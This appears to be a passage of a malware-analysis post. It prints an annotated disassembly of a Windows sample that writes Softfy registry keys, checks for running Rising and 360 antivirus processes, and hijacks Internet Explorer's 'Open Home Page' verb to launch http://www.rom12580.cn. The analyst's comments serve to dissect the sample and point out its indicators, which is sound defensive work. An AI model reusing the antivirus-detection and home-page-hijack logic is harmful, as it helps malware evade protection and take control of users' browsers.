00403612 |. 68 64E14300 PUSH 复件_123.0043E164 ; ASCII "HitProbaby"
00403617 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040361A |. E8 E1E9FFFF CALL 复件_123.00402000 //HitProbaby = 0
0040361F |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403622 |. E8 A6DBFFFF CALL 复件_123.004011CD //close WebIni
00403627 |. 68 48E14300 PUSH 复件_123.0043E148 ; ASCII "SOFTWARE\Softfy\LockPage"
0040362C |. 56 PUSH ESI
0040362D |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403630 |. E8 62DBFFFF CALL 复件_123.00401197 //create HKLM\SOFTWARE\Softfy\LockPage
00403635 |. 85C0 TEST EAX,EAX
00403637 |. 5F POP EDI //restore EDI (flags preserved)
00403638 |. 75 1C JNZ SHORT 复件_123.00403656
0040363A |. 53 PUSH EBX
0040363B |. 68 3CE14300 PUSH 复件_123.0043E13C ; ASCII "LockPageNum" //registry value
00403640 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403643 |. E8 B8E9FFFF CALL 复件_123.00402000 //LockPageNum = 0
00403648 |. 53 PUSH EBX
00403649 |. 68 2CE14300 PUSH 复件_123.0043E12C ; ASCII "NeedLockPage" //registry value
0040364E |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403651 |. E8 AAE9FFFF CALL 复件_123.00402000 //NeedLockPage = 0
00403656 |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403659 |. E8 6FDBFFFF CALL 复件_123.004011CD //close LockPage
0040365E |. 68 14E14300 PUSH 复件_123.0043E114 ; ASCII "SOFTWARE\Softfy\CSID" //registry key
00403663 |. 56 PUSH ESI
00403664 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
00403667 |. E8 2BDBFFFF CALL 复件_123.00401197 //create HKLM\SOFTWARE\Softfy\CSID
0040366C |. 85C0 TEST EAX,EAX
0040366E |. 75 37 JNZ SHORT 复件_123.004036A7
00403670 |. 68 ECE04300 PUSH 复件_123.0043E0EC ; ASCII "{C4560D12-CE25-4A2E-A5D4-B5070FCBE282}"
00403675 |. 68 E4E04300 PUSH 复件_123.0043E0E4 ; ASCII "csid"
0040367A |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040367D |. E8 99E9FFFF CALL 复件_123.0040201B //csid = that GUID string (the author associates it with the home-page lock)
00403682 |. FF35 E4E54300 PUSH DWORD PTR DS:[43E5E4] //global CString filled in by 0040443F
00403688 |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
0040368B |. 68 DCE04300 PUSH 复件_123.0043E0DC ; ASCII "dllname"
00403690 |. E8 86E9FFFF CALL 复件_123.0040201B //dllname = <global CString 0043E5E4>
00403695 |. 68 9CE04300 PUSH 复件_123.0043E09C ; ASCII "D:\ssshall" //hard-coded drop path
0040369A |. 68 D4E04300 PUSH 复件_123.0043E0D4 ; ASCII "dllpath"
0040369F |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004036A2 |. E8 74E9FFFF CALL 复件_123.0040201B //dllpath = "D:\ssshall"
004036A7 |> 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004036AA |. E8 1EDBFFFF CALL 复件_123.004011CD //close CSID
004036AF |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
004036B2 |. C645 FC 05 MOV BYTE PTR SS:[EBP-4],5
004036B6 |. E8 F1DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> //destructors in reverse order of construction, trylevel unwound step by step
004036BB |. 8D4D D4 LEA ECX,DWORD PTR SS:[EBP-2C]
004036BE |. C645 FC 04 MOV BYTE PTR SS:[EBP-4],4
004036C2 |. E8 6BDAFFFF CALL 复件_123.00401132 //destroy the registry-helper object
004036C7 |. 8D4D EC LEA ECX,DWORD PTR SS:[EBP-14]
004036CA |. C645 FC 03 MOV BYTE PTR SS:[EBP-4],3
004036CE |. E8 D9DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036D3 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
004036D6 |. C645 FC 02 MOV BYTE PTR SS:[EBP-4],2
004036DA |. E8 CDDDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036DF |. 8D4D E4 LEA ECX,DWORD PTR SS:[EBP-1C]
004036E2 |. C645 FC 01 MOV BYTE PTR SS:[EBP-4],1
004036E6 |. E8 C1DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036EB |. 8D4D E0 LEA ECX,DWORD PTR SS:[EBP-20]
004036EE |. 885D FC MOV BYTE PTR SS:[EBP-4],BL
004036F1 |. E8 B6DDFFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ>
004036F6 |. 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF
004036FA |. 8D4D C4 LEA ECX,DWORD PTR SS:[EBP-3C]
004036FD |. E8 ACDEFFFF CALL <JMP.&MFC42.#665_??1CFile@@UAE@XZ> //destroy the unused CFile
00403702 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] //EH epilogue
00403705 |. 5E POP ESI
00403706 |. 5B POP EBX
00403707 |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
0040370E |. C9 LEAVE
0040370F \. C3 RETN
; 00401197 (repeat of the listing shown earlier in the post) — RegCreateKeyExA wrapper, thiscall: this = ECX; stack args hKey, lpSubKey.
; Stores lpSubKey in the CString at this+8, creates/opens the key with KEY_ALL_ACCESS, keeps the HKEY at this+4 and returns the
; LSTATUS in EAX (0 = ERROR_SUCCESS). It always creates, so every call is a registry write.
00401197 /$ 55 PUSH EBP
00401198 |. 8BEC MOV EBP,ESP
0040119A |. 51 PUSH ECX //local: lpdwDisposition at EBP-4
0040119B |. 56 PUSH ESI
0040119C |. 8BF1 MOV ESI,ECX //ESI = this
0040119E |. FF75 0C PUSH DWORD PTR SS:[EBP+C] //lpSubKey
004011A1 |. 8D4E 08 LEA ECX,DWORD PTR DS:[ESI+8]
004011A4 |. E8 09030000 CALL <JMP.&MFC42.#860_??4CString@@QAEABV> //this->subkey = lpSubKey
004011A9 |. 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4]
004011AC |. 83C6 04 ADD ESI,4 //ESI = &this->hKey
004011AF |. 50 PUSH EAX ; /pDisposition
004011B0 |. 33C0 XOR EAX,EAX ; |
004011B2 |. 56 PUSH ESI ; |pHandle
004011B3 |. 50 PUSH EAX ; |pSecurity => NULL
004011B4 |. 68 3F000F00 PUSH 0F003F ; |Access = KEY_ALL_ACCESS
004011B9 |. 50 PUSH EAX ; |Options => REG_OPTION_NON_VOLATILE
004011BA |. 50 PUSH EAX ; |Class => NULL
004011BB |. 50 PUSH EAX ; |Reserved => 0
004011BC |. FF75 0C PUSH DWORD PTR SS:[EBP+C] ; |Subkey
004011BF |. FF75 08 PUSH DWORD PTR SS:[EBP+8] ; |hKey
004011C2 |. FF15 08504000 CALL DWORD PTR DS:[<&ADVAPI32.RegCreateK>; \RegCreateKeyExA //EAX = LSTATUS returned to the caller
004011C8 |. 5E POP ESI
004011C9 |. C9 LEAVE
004011CA \. C2 0800 RETN 8 //callee pops the two stack args
; 00404000 — returns 1 in EAX if any running process has "ravmond.exe" in its (lower-cased) image name, else 0.
; Enumerates with CreateToolhelp32Snapshot / Process32First / Process32Next; PROCESSENTRY32 lives at EBP-138 (dwSize = 0x128),
; so EBP-114 is its szExeFile member (offset 0x24). On a hit it jumps out without CloseHandle, leaking the snapshot handle.
; The AV-process check itself is a useful behavioural signature: the caller changes course when this returns 1.
00404000 /$ B8 0C194000 MOV EAX,复件_123.0040190C //EH handler for this frame
00404005 |. E8 E6D5FFFF CALL 复件_123.004015F0 //VC EH prolog
0040400A |. 81EC 2C010000 SUB ESP,12C
00404010 |. 56 PUSH ESI
00404011 |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00404014 |. E8 87D4FFFF CALL <JMP.&MFC42.#540_??0CString@@QAE@XZ> //CString at EBP-10 holds the current process name
00404019 |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0 //trylevel = 0
0040401D |. 6A 00 PUSH 0 ; /ProcessID = 0
0040401F |. 6A 02 PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00404021 |. E8 D2D7FFFF CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot //take a process snapshot to search for a process
00404026 |. 8BF0 MOV ESI,EAX //ESI = hSnapshot
00404028 |. 8D85 C8FEFFFF LEA EAX,DWORD PTR SS:[EBP-138]
0040402E |. 50 PUSH EAX ; /pProcessentry
0040402F |. 56 PUSH ESI ; |hSnapshot
00404030 |. C785 C8FEFFFF>MOV DWORD PTR SS:[EBP-138],128 ; | //pe.dwSize = 0x128 = sizeof(PROCESSENTRY32)
0040403A |. E8 B3D7FFFF CALL <JMP.&KERNEL32.Process32First> ; \Process32First
0040403F |> 85C0 /TEST EAX,EAX //loop while the last First/Next succeeded
00404041 |. 74 3D |JE SHORT 复件_123.00404080
00404043 |. 8D85 ECFEFFFF |LEA EAX,DWORD PTR SS:[EBP-114] //&pe.szExeFile
00404049 |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
0040404C |. 50 |PUSH EAX
0040404D |. E8 60D4FFFF |CALL <JMP.&MFC42.#860_??4CString@@QAEAB> //name = pe.szExeFile
00404052 |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00404055 |. E8 72D5FFFF |CALL <JMP.&MFC42.#4202_?MakeLower@CStri> //lower-case for a case-insensitive match
0040405A |. 68 74E24300 |PUSH 复件_123.0043E274 ; ASCII "ravmond.exe"
0040405F |. 8D4D F0 |LEA ECX,DWORD PTR SS:[EBP-10]
00404062 |. E8 5FD5FFFF |CALL <JMP.&MFC42.#2764_?Find@CString@@Q> //name.Find("ravmond.exe")
00404067 |. 83F8 FF |CMP EAX,-1
0040406A |. 75 0F |JNZ SHORT 复件_123.0040407B //found -> return 1
0040406C |. 8D85 C8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-138]
00404072 |. 50 |PUSH EAX ; /pProcessentry
00404073 |. 56 |PUSH ESI ; |hSnapshot
00404074 |. E8 73D7FFFF |CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
00404079 |.^ EB C4 \JMP SHORT 复件_123.0040403F
0040407B |> 6A 01 PUSH 1 //found: ESI (return value) = 1; note the snapshot handle is not closed on this path
0040407D |. 5E POP ESI
0040407E |. EB 09 JMP SHORT 复件_123.00404089
00404080 |> 56 PUSH ESI ; /hObject //not found: close the snapshot
00404081 |. FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
00404087 |. 33F6 XOR ESI,ESI //return value = 0
00404089 |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF //trylevel = -1
0040408D |. 8D4D F0 LEA ECX,DWORD PTR SS:[EBP-10]
00404090 |. E8 17D4FFFF CALL <JMP.&MFC42.#800_??1CString@@QAE@XZ> //destroy the name CString
00404095 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] //EH epilogue
00404098 |. 8BC6 MOV EAX,ESI //EAX = 1 if found, else 0
0040409A |. 5E POP ESI
0040409B |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
004040A2 |. C9 LEAVE
004040A3 \. C3 RETN
; 00404389 — returns 1 in EAX if some running process name contains "360tray.exe" or "360TRAY.EXE" (360 Safeguard tray), else 0.
; Same Toolhelp enumeration as 00404000 but with plain strstr on PROCESSENTRY32.szExeFile (struct at EBP-12C, szExeFile at
; EBP-108, th32ProcessID at EBP-124). On a match it copies the name to a local buffer, keeps the PID in EBX and emits
; "Find 360 Process" through OutputDebugStringA — that debug string is a cheap artefact to look for in a sandbox.
; The loop does not stop at the first match, so EBX ends up holding the PID of the last matching entry.
00404389 /$ 55 PUSH EBP
0040438A |. 8BEC MOV EBP,ESP
0040438C |. 81EC 30020000 SUB ESP,230 //locals: hSnapshot (EBP-4), PROCESSENTRY32 (EBP-12C), name copy (EBP-230)
00404392 |. 53 PUSH EBX
00404393 |. 33DB XOR EBX,EBX //EBX = matched PID, 0 = none
00404395 |. 53 PUSH EBX ; /ProcessID = 0
00404396 |. 6A 02 PUSH 2 ; |Flags = TH32CS_SNAPPROCESS
00404398 |. E8 5BD4FFFF CALL <JMP.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
0040439D |. 8D8D D4FEFFFF LEA ECX,DWORD PTR SS:[EBP-12C]
004043A3 |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX //hSnapshot
004043A6 |. 51 PUSH ECX ; /pProcessentry
004043A7 |. 50 PUSH EAX ; |hSnapshot
004043A8 |. C785 D4FEFFFF>MOV DWORD PTR SS:[EBP-12C],128 ; | //pe.dwSize = 0x128 = sizeof(PROCESSENTRY32)
004043B2 |. E8 3BD4FFFF CALL <JMP.&KERNEL32.Process32First> ; \Process32First
004043B7 |. 85C0 TEST EAX,EAX
004043B9 |. 74 70 JE SHORT 复件_123.0040442B //no entries: close and return 0 (ESI/EDI are not pushed on this path)
004043BB |. 56 PUSH ESI
004043BC |. 8B35 50504000 MOV ESI,DWORD PTR DS:[<&KERNEL32.OutputD>; kernel32.OutputDebugStringA
004043C2 |. 57 PUSH EDI
004043C3 |. BF F0E34300 MOV EDI,复件_123.0043E3F0 ; ASCII "Find 360 Process"
004043C8 |> 8D85 F8FEFFFF /LEA EAX,DWORD PTR SS:[EBP-108] //&pe.szExeFile
004043CE |. 68 E4E34300 |PUSH 复件_123.0043E3E4 ; /s2 = "360tray.exe"
004043D3 |. 50 |PUSH EAX ; |s1
004043D4 |. FF15 88514000 |CALL DWORD PTR DS:[<&MSVCRT.strstr>] ; \strstr //lower-case spelling
004043DA |. 59 |POP ECX
004043DB |. 85C0 |TEST EAX,EAX
004043DD |. 59 |POP ECX
004043DE |. 75 18 |JNZ SHORT 复件_123.004043F8
004043E0 |. 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
004043E6 |. 68 D8E34300 |PUSH 复件_123.0043E3D8 ; /s2 = "360TRAY.EXE"
004043EB |. 50 |PUSH EAX ; |s1
004043EC |. FF15 88514000 |CALL DWORD PTR DS:[<&MSVCRT.strstr>] ; \strstr //upper-case spelling (mixed case would be missed)
004043F2 |. 59 |POP ECX
004043F3 |. 85C0 |TEST EAX,EAX
004043F5 |. 59 |POP ECX
004043F6 |. 74 1E |JE SHORT 复件_123.00404416 //no match -> next entry
004043F8 |> 8D85 F8FEFFFF |LEA EAX,DWORD PTR SS:[EBP-108]
004043FE |. 50 |PUSH EAX ; /src
004043FF |. 8D85 D0FDFFFF |LEA EAX,DWORD PTR SS:[EBP-230] ; |
00404405 |. 50 |PUSH EAX ; |dest
00404406 |. E8 C7D1FFFF |CALL <JMP.&MSVCRT.strcpy> ; \strcpy //copy the matched name to the local buffer
0040440B |. 8B9D DCFEFFFF |MOV EBX,DWORD PTR SS:[EBP-124] //EBX = pe.th32ProcessID
00404411 |. 59 |POP ECX
00404412 |. 59 |POP ECX
00404413 |. 57 |PUSH EDI
00404414 |. FFD6 |CALL ESI //OutputDebugStringA("Find 360 Process")
00404416 |> 8D85 D4FEFFFF |LEA EAX,DWORD PTR SS:[EBP-12C]
0040441C |. 50 |PUSH EAX ; /pProcessentry
0040441D |. FF75 FC |PUSH DWORD PTR SS:[EBP-4] ; |hSnapshot
00404420 |. E8 C7D3FFFF |CALL <JMP.&KERNEL32.Process32Next> ; \Process32Next
00404425 |. 85C0 |TEST EAX,EAX
00404427 |.^ 75 9F \JNZ SHORT 复件_123.004043C8 //continue until the enumeration is exhausted
00404429 |. 5F POP EDI
0040442A |. 5E POP ESI
0040442B |> FF75 FC PUSH DWORD PTR SS:[EBP-4] ; /hObject
0040442E |. FF15 60504000 CALL DWORD PTR DS:[<&KERNEL32.CloseHandl>; \CloseHandle
00404434 |. 33C0 XOR EAX,EAX
00404436 |. 3BC3 CMP EAX,EBX //CF = (0 < EBX), i.e. a PID was recorded
00404438 |. 5B POP EBX
00404439 |. 1BC0 SBB EAX,EAX //EAX = -CF
0040443B |. F7D8 NEG EAX //EAX = 1 if a match was found, else 0
0040443D |. C9 LEAVE
0040443E \. C3 RETN
; 004041DA — IE home-page hijack. Builds the command line
;   "<drive>:\Program Files\Internet Explorer\IEXPLORE.EXE" http://www.rom12580.cn
; (the drive letter is the first character returned by GetWindowsDirectoryA) and stores it under
; HKCR\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command — the "Open Home Page" verb of the
; Internet Explorer desktop-icon namespace object — so that verb launches IE on the attacker's URL instead of the user's home page.
; Defensive note: this key, and the URL, are the concrete indicators from this routine; restoring the key undoes the hijack.
004041DA /$ B8 20194000 MOV EAX,123.00401920 //EH handler for this frame
004041DF |. E8 0CD4FFFF CALL 123.004015F0 //VC EH prolog
004041E4 |. 81EC 14020000 SUB ESP,214
004041EA |. 56 PUSH ESI
004041EB |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
004041EE |. E8 0ACFFFFF CALL 123.004010FD //construct the registry-helper object at EBP-18 (same helper the other registry routines use)
004041F3 |. 8365 FC 00 AND DWORD PTR SS:[EBP-4],0 //trylevel = 0
004041F7 |. BE 04010000 MOV ESI,104 //ESI = 260 (MAX_PATH)
004041FC |. 8D85 E0FDFFFF LEA EAX,DWORD PTR SS:[EBP-220] //windir buffer
00404202 |. 56 PUSH ESI ; /BufSize = 104 (260.)
00404203 |. 50 PUSH EAX ; |Buffer
00404204 |. FF15 4C504000 CALL DWORD PTR DS:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA //get the Windows directory, only its drive letter is used
0040420A |. 56 PUSH ESI ; /n => 104 (260.)
0040420B |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C] ; | //command-line buffer
00404211 |. 6A 00 PUSH 0 ; |c = 00
00404213 |. 50 PUSH EAX ; |s
00404214 |. E8 3BD4FFFF CALL <JMP.&MSVCRT.memset> ; \memset //zero the 260-byte command buffer
00404219 |. 8A85 E0FDFFFF MOV AL,BYTE PTR SS:[EBP-220] //AL = windir[0] (drive letter)
0040421F |. 68 48E34300 PUSH 123.0043E348 ; /src = ":\Program Files\Internet Explorer\IEXPLORE.EXE"
00404224 |. 8885 E5FEFFFF MOV BYTE PTR SS:[EBP-11B],AL ; | //cmd[1] = drive letter
0040422A |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C] ; |
00404230 |. 50 PUSH EAX ; |dest
00404231 |. C685 E4FEFFFF>MOV BYTE PTR SS:[EBP-11C],22 ; | //cmd[0] = '"' (opening quote)
00404238 |. E8 9BD3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat //cmd = "<drive>:\Program Files\Internet Explorer\IEXPLORE.EXE
0040423D |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C]
00404243 |. 68 44E34300 PUSH 123.0043E344 ; /src = """
00404248 |. 50 PUSH EAX ; |dest
00404249 |. E8 8AD3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat //closing quote
0040424E |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C]
00404254 |. 68 40E34300 PUSH 123.0043E340 ; /src = " "
00404259 |. 50 PUSH EAX ; |dest
0040425A |. E8 79D3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat //separator
0040425F |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C]
00404265 |. 68 28E34300 PUSH 123.0043E328 ; /src = "http://www.rom12580.cn"
0040426A |. 50 PUSH EAX ; |dest
0040426B |. E8 68D3FFFF CALL <JMP.&MSVCRT.strcat> ; \strcat //append the hijack URL as IE's argument
00404270 |. 83C4 2C ADD ESP,2C //pop memset (3 dwords) + 4 x strcat (2 dwords each)
00404273 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00404276 |. 68 E0E24300 PUSH 123.0043E2E0 ; ASCII "CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command"
0040427B |. 68 00000080 PUSH 80000000 //hKey = HKEY_CLASSES_ROOT
00404280 |. E8 E6CEFFFF CALL 123.0040116B //open/create that key (author: "write to the registry"); EAX = status, 0 = success
00404285 |. 85C0 TEST EAX,EAX
00404287 |. 5E POP ESI //flags preserved
00404288 |. 75 11 JNZ SHORT 123.0040429B //failed -> skip the write
0040428A |. 8D85 E4FEFFFF LEA EAX,DWORD PTR SS:[EBP-11C]
00404290 |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
00404293 |. 50 PUSH EAX //value data = the command line built above
00404294 |. 6A 00 PUSH 0 //value name NULL — presumably the key's (Default) value, matching the (name, data) order used by 0040201B
00404296 |. E8 A8DDFFFF CALL 123.00402043 //write it: IEXPLORE.EXE now gets http://www.rom12580.cn appended as its argument
0040429B |> 834D FC FF OR DWORD PTR SS:[EBP-4],FFFFFFFF //trylevel = -1
0040429F |. 8D4D E8 LEA ECX,DWORD PTR SS:[EBP-18]
004042A2 |. E8 8BCEFFFF CALL 123.00401132 //close the key / destroy the helper object
004042A7 |. 8B4D F4 MOV ECX,DWORD PTR SS:[EBP-C] //EH epilogue
004042AA |. 64:890D 00000>MOV DWORD PTR FS:[0],ECX
004042B1 |. C9 LEAVE
004042B2 \. C3 RETN